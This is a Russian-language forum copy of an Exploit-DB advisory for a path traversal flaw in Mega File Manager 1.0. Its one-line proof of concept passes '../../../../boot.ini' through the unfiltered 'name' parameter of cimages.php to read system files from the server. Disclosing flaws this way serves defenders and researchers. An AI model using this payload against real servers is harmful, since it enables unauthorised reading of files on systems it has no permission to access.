- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 18768
- Проверка EDB
-
- Пройдено
- Автор
- I2SEC-MIN GI JO
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- null
- Дата публикации
- 2012-04-22
Код:
# Exploit Title: [MegaFileManager FileDownload Vulnerability
# date: 2012-04-19
# Author: i2sec-Min Gi Jo
# Software Link: http://www.awesomephp.com/?Download*5
# Version: Mega File Manager V 1.0
# Tested on: Windows
# Description : There is no filtering on 'cimages.php' parameter 'name'.
# PoC : http://[server]/megafilemanager/cimages.php?name=../../../../boot.ini- Источник
- www.exploit-db.com
